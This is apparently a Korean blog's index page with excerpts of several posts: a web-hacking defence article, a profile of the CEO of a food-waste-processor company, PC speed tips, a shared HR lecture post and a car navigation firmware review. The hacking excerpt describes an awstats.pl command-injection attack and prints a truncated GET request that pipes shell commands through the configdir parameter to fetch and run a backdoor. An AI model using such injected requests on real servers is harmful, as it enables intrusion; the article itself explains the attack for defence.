본문 바로가기

IT 이야기

최신 웹 해킹에 대응하는 방법!!! 최근 웹 애플리케이션의 취약성을 이용한 웹 해킹이 기승을 부리고 있다. 다음은 대표적인 웹 로그 분석 프로그램인 'awstats'의 취약성을 이용한 공격 사례다. 홍석범 | 오늘과 내일 과장 이는 GET 메소드로 해당 사이트에 특정 옵션을 주면 바로 시스템 명령어를 실행할 수 있다는 점을 이용한 것으로, 먼저 /tmp 디렉토리로 이동한 뒤 특정 사이트에서 백도어 파일을 다운로드하고 perl을 실행한다는 것을 알 수 있다. 이 때 awstats.pl에 SUID(Set User ID) 가 설정되지 않으면 웹 서버 권한으로 실행돼 nobody로 작동할 것이다. GET http://www.domain.com/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%2.. 더보기
이희자 루펜리 대표 이희자 루펜리 대표 '생태블럭'으로 제2 성공시대 연다 '폴라카블 기술' R&D투자 집중·특허등록 마쳐 2,000억원 규모 하천생태블럭·도로공사 수주 음식물처리기·가습기 이어 또 한번 대박 야심 "아침에 눈을 뜰 때마다 오늘 하루는 어떤 일이 벌어질지 가슴이 설레요. 집에서 살림만 하던 아줌마가 이제서야 적성에 맞는 일을 발견했는데 하루하루가 얼마나 즐겁겠습니까.(웃음)" 음식물처리기 전문기업 루펜리의 이희자(56ㆍ사진) 대표는 49세의 늦깎이 사업가이지만 여성 벤처업계에선 신화같은 인물로 평가받고 있다. 강원도 원주에서 태어나 고졸학력으로 27년간 2남1녀의 어머니이자 맏며느리 역할을 하며 평범한 주부의 삶을 걸어오던 이 대표에게 사업은 '인생에서 제2막'에 해당된다. "음식물처리기를 구입하기 위해 전.. 더보기
컴퓨터 성능 향상 방법 컴퓨터 성능 향상 방법 1. Windows폴더 → Prefatch 폴더안에 *.pf 파일들을 모두 삭제한다. 프로그램을 설치하거나 레지 건드는 위험한 팁이 아니니 한번 시도해 보세요. 그런데, 윈도우 사용하다보면 pf파일이 또다시 쌓이게 됩니다. 주기적으로 지워줘야 한다는게 귀찮기는 하지만.. 2. 웹페이지 로딩을 빠르게 윈도탐색기 → 도구 → 폴더옵션을 선택하신 후 【보기】탭에 보시면 【네트워크 폴더 및 프린터 자동검색】이라는 항목이 있는데 이 항목의 선택을 지운다. 프린터 자동검색을 해제하시면 웹페이지가 단번에 뜹니다. 3. * 화면이동을 부드럽게? 익스플로러에서 화면 이동할 때 마우스의 휠 기능을 사용하는데, 좀 무겁게 느껴진다거나 끊기는 느낌이 있을 때 유용한 것 같네요. 특히 저 사양 컴퓨터에서.. 더보기
[펌] 이민철 원장님 1월 정기 모임 강의 HR전문가클럽 정기모임에서 실시하는 모든 강의를 동영상으로 만들어 클럽에 공지 하기로 하여 강사님들께 동의를 얻고 게시를 합니다. 모임에 참석 못하신 회원님들을 위한 조치이오니 참석 못하신 회원님들은 이곳에서 좋은 강의 들으시길 바랍니다. 꾸벅.... 포엑스씨앤씨 이민철 원장님.. 프로의 정신 1. 프로의 정신 2 프로의 정신 3 프로의 정신 4 도덕성에 관한 영상이 있었는데 이것 또한 저작권에 걸려 삭제 했습니다. 내용은 대학생 들에세 실험에 참여 해달라는 요청을 하면서 사례비를 10만원 준다고 하고 도덕성에 관한 실험에 참여 시킵니다. 실험 후 사례비 15만원 이라고 하며 주면 대부분이 그냥 받는 다는 실험 내용의 동영상 입니다. 프로의 정신 5 프로의정신6 프로의 자세7 이번 동영상이 문제가 있어서.. 더보기
펌웨어 업데이트에서 좋은 점.. 엑스로드 v7 Season 2 . (일명 비칠이). 펌웨어 업데이트에서 좋은 점.. 초기화면 > Setup 으로 들어가면 설정하는데 있어서 버튼이 하나 보인다. 예전에는 DMB를 볼거냐 TPEG을 이용할거냐 둘중 하나를 선택해야만 했는데.. AUTO 버튼이 하나 있어 선택했더니.. TPEG기능과 DMB기능을 동시에 이용가능하게 되었다. 정말 비칠이 처음샀을때 욕 디지게 했는데.. 도대체 어떤 놈이 만들었길래 이따우로 만들어서 귀찮게 했냐고.. ㅎㅎ 근데 그걸 알아들었는지 한꺼번에 기능이 사용될수 있게 해놨네요. 어차피 사람들이 거의 AUTO로 놓을건데 왜 굳이 다른것도 따로 선택하게 해놨는지는 아직 의문입니다. 뭔가 다른 이유가 있겠지요? 더보기